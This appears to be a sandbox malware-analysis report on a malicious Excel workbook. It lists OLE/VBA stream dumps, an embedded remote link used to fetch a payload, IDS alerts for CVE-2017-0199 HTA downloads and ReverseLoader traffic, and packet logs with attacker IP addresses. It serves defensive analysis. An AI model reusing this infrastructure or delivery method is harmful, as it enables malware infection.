                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:2486
                                                  Entropy:3.9244127831265385
                                                  Base64 Encoded:False
                                                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                  Stream Path: MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 536
                                                  General
                                                  Stream Path:MBD007009DB/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:536
                                                  Entropy:6.330646364694152
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                  Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                  Stream Path: MBD007009DB/MBD00726B69/\x1CompObj, File Type: data, Stream Size: 114
                                                  General
                                                  Stream Path:MBD007009DB/MBD00726B69/\x1CompObj
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:114
                                                  Entropy:4.219515110876372
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD007009DB/MBD00726B69/Package, File Type: Microsoft Excel 2007+, Stream Size: 26242
                                                  General
                                                  Stream Path:MBD007009DB/MBD00726B69/Package
                                                  CLSID:
                                                  File Type:Microsoft Excel 2007+
                                                  Stream Size:26242
                                                  Entropy:7.635424485665502
                                                  Base64 Encoded:True
                                                  Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Stream Path: MBD007009DB/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 283872
                                                  General
                                                  Stream Path:MBD007009DB/Workbook
                                                  CLSID:
                                                  File Type:Applesoft BASIC program data, first line number 16
                                                  Stream Size:283872
                                                  Entropy:7.743278150467805
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Stream Path: MBD007009DC/\x1Ole, File Type: data, Stream Size: 900
                                                  General
                                                  Stream Path:MBD007009DC/\x1Ole
                                                  CLSID:
                                                  File Type:data
                                                  Stream Size:900
                                                  Entropy:4.690868210226044
                                                  Base64 Encoded:False
                                                  Data ASCII:. . . . c . . I . . . . . . . . . . . . & . . . y . . . K . " . . . h . t . t . p . s . : . / . / . l . i . n . k . j . a . g . o . . . m . e . / . R . H . C . Y . X . p . ? . & . d . a . m . a . g . e . = . n . a . s . t . y . . & . b . r . i . e . f . s . = . m . o . m . e . n . t . o . u . s . & . h . i . g . h . l . i . g . h . t . = . d . e . l . i . c . i . o . u . s . & . m . i . d . d . l . e . m . a . n . = . m . a . g . e . n . t . a . & . s . p . a . n . k . . . E ( . A + C . . . F . . T 5 i !
                                                  Data Raw:01 00 00 02 a3 63 db 02 95 c5 b3 49 00 00 00 00 00 00 00 00 00 00 00 00 26 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 22 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6c 00 69 00 6e 00 6b 00 6a 00 61 00 67 00 6f 00 2e 00 6d 00 65 00 2f 00 52 00 48 00 43 00 59 00 58 00 70 00 3f 00 26 00 64 00 61 00 6d 00 61 00 67 00 65 00 3d 00 6e 00 61 00 73 00 74 00 79 00
                                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 291629
                                                  General
                                                  Stream Path:Workbook
                                                  CLSID:
                                                  File Type:Applesoft BASIC program data, first line number 16
                                                  Stream Size:291629
                                                  Entropy:7.998497664529042
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . . < . [ \\ / z g 2 } . ; . m c - f + | B s E . T . ( " { o . . . . . . . Z . . . \\ . p . Q I c . > ) / A 2 | > . d K . . M . m . b . $ H . . r 2 w | . | B W # " < 3 9 ( h a . 0 L . ' j n & . . . T o . . B . . . # ~ a . . . ` . . . = . . . a q = . + K . . . . : . l . M . . . . . . . . & . . . . V . . . . g . . . . . . o = . . . 6 . . . 6 ` 6 @ . . . ] . . . " . . . . 3 . . . . x . . . < . . . . 1 . . . { s \\ E ] . % $ F 1 . o 1 U H | . j . Z R . 1 .
                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 e4 de 81 1f 86 15 3c 08 5b 5c 2f 7a 67 32 e3 7d ae 07 b4 3b f5 e4 0e 88 6d 63 2d a5 66 2b 7c 42 73 45 7f 54 08 b4 91 28 d1 20 22 d7 7b 6f df dc e1 00 02 00 b0 04 c1 00 02 00 9c 5a e2 00 00 00 5c 00 70 00 51 49 63 c5 00 f3 8a 3e 29 93 2f 41 fe 32 7c 3e b8 80 ce 83 eb ca 64 fa b8 4b de 02 f5 b7

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-12-02T07:24:37.155643+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249162146.70.113.20080TCP
                                                  2024-12-02T07:24:37.155691+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1146.70.113.20080192.168.2.2249162TCP
                                                  2024-12-02T07:24:42.088643+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164146.70.113.20080TCP
                                                  2024-12-02T07:24:42.088685+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1146.70.113.20080192.168.2.2249164TCP
                                                  2024-12-02T07:24:49.307750+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249165146.70.113.20080TCP
                                                  2024-12-02T07:25:02.943212+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.77443192.168.2.2249167TCP
                                                  2024-12-02T07:25:03.187164+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249171146.70.113.20080TCP
                                                  2024-12-02T07:25:21.057960+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.77443192.168.2.2249172TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 2, 2024 07:24:32.885755062 CET49161443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:32.885792971 CET44349161188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:32.885838985 CET49161443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:32.935789108 CET49161443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:32.935806036 CET44349161188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:34.245467901 CET44349161188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:34.245557070 CET49161443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:34.251127958 CET49161443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:34.251137972 CET44349161188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:34.251543045 CET44349161188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:34.251595974 CET49161443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:34.321120024 CET49161443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:34.363337994 CET44349161188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:35.453170061 CET44349161188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:35.453278065 CET49161443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:35.453290939 CET44349161188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:35.453316927 CET44349161188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:35.453331947 CET49161443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:35.453353882 CET49161443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:35.454613924 CET49161443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:24:35.454627991 CET44349161188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:24:35.464591026 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:35.584559917 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:35.584651947 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:35.584834099 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:35.704695940 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.155558109 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.155585051 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.155606985 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.155642986 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.155682087 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.155690908 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.155720949 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.155730963 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.155735970 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.155752897 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.155756950 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.155781984 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.155790091 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.155941963 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.155952930 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.155968904 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.155987024 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.156025887 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.161874056 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.275677919 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.275729895 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.275764942 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.275810003 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.279835939 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.279890060 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.377588987 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.377662897 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.377749920 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.377789974 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.381762028 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.381819963 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.383290052 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.383352041 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.383436918 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.383481979 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.391758919 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.391814947 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.391874075 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.391915083 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.400100946 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.400147915 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.400207996 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.400254965 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.408513069 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.408570051 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.408612967 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.408659935 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.416919947 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.416984081 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.417038918 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.417123079 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.424565077 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.424606085 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.424658060 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.424704075 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.432216883 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.432267904 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.432367086 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.432415962 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.439905882 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.439969063 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.439986944 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.440032005 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.447551012 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.447618008 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.447637081 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.447680950 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.455193043 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.455271006 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.561872959 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.561913013 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.600054979 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.600153923 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.600156069 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.600194931 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.602821112 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.602865934 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.602891922 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.602932930 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.608418941 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.608475924 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.608515024 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.608561039 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.614007950 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.614075899 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.614110947 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.614155054 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.619622946 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.619672060 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.619679928 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.619713068 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.625138998 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.625215054 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.625241995 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.625288010 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.630726099 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.630764961 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.630836010 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.630873919 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.636301994 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.636370897 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.636401892 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.636445999 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.641866922 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.641912937 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.641995907 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.642043114 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.647470951 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.647521019 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.647562981 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.647597075 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.653048992 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.653095007 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.653157949 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.653197050 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.658648968 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.658716917 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.658721924 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.658754110 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.664192915 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.664247990 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.664302111 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.664345026 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.669828892 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.669872046 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.669931889 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.669971943 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.675393105 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.675436974 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.675498009 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.675537109 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:37.680936098 CET8049162146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:37.680994987 CET4916280192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:38.399703026 CET49163443192.168.2.22188.114.97.6
                                                  Dec 2, 2024 07:24:38.399733067 CET44349163188.114.97.6192.168.2.22
                                                  Dec 2, 2024 07:24:38.399792910 CET49163443192.168.2.22188.114.97.6
                                                  Dec 2, 2024 07:24:38.440522909 CET49163443192.168.2.22188.114.97.6
                                                  Dec 2, 2024 07:24:38.440537930 CET44349163188.114.97.6192.168.2.22
                                                  Dec 2, 2024 07:24:39.652465105 CET44349163188.114.97.6192.168.2.22
                                                  Dec 2, 2024 07:24:39.652568102 CET49163443192.168.2.22188.114.97.6
                                                  Dec 2, 2024 07:24:39.657599926 CET49163443192.168.2.22188.114.97.6
                                                  Dec 2, 2024 07:24:39.657604933 CET44349163188.114.97.6192.168.2.22
                                                  Dec 2, 2024 07:24:39.657921076 CET44349163188.114.97.6192.168.2.22
                                                  Dec 2, 2024 07:24:39.657974005 CET49163443192.168.2.22188.114.97.6
                                                  Dec 2, 2024 07:24:39.731234074 CET49163443192.168.2.22188.114.97.6
                                                  Dec 2, 2024 07:24:39.771330118 CET44349163188.114.97.6192.168.2.22
                                                  Dec 2, 2024 07:24:40.380202055 CET44349163188.114.97.6192.168.2.22
                                                  Dec 2, 2024 07:24:40.380337954 CET44349163188.114.97.6192.168.2.22
                                                  Dec 2, 2024 07:24:40.380460024 CET49163443192.168.2.22188.114.97.6
                                                  Dec 2, 2024 07:24:40.381759882 CET49163443192.168.2.22188.114.97.6
                                                  Dec 2, 2024 07:24:40.381777048 CET44349163188.114.97.6192.168.2.22
                                                  Dec 2, 2024 07:24:40.391335964 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:40.512576103 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:40.512690067 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:40.512866020 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:40.632886887 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.088551044 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.088572979 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.088582039 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.088643074 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.088685036 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.088697910 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.088707924 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.088718891 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.088727951 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.088741064 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.088759899 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.088898897 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.088934898 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.088943005 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.088953972 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.088973999 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.088990927 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.208703995 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.208734989 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.208810091 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.212861061 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.212948084 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.310982943 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.311036110 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.311136007 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.315206051 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.315231085 CET8049164146.70.113.200192.168.2.22
                                                  Dec 2, 2024 07:24:42.315303087 CET4916480192.168.2.22146.70.113.200
                                                  Dec 2, 2024 07:24:42.323563099 CET8049164146.70.113.200192.168.2.22
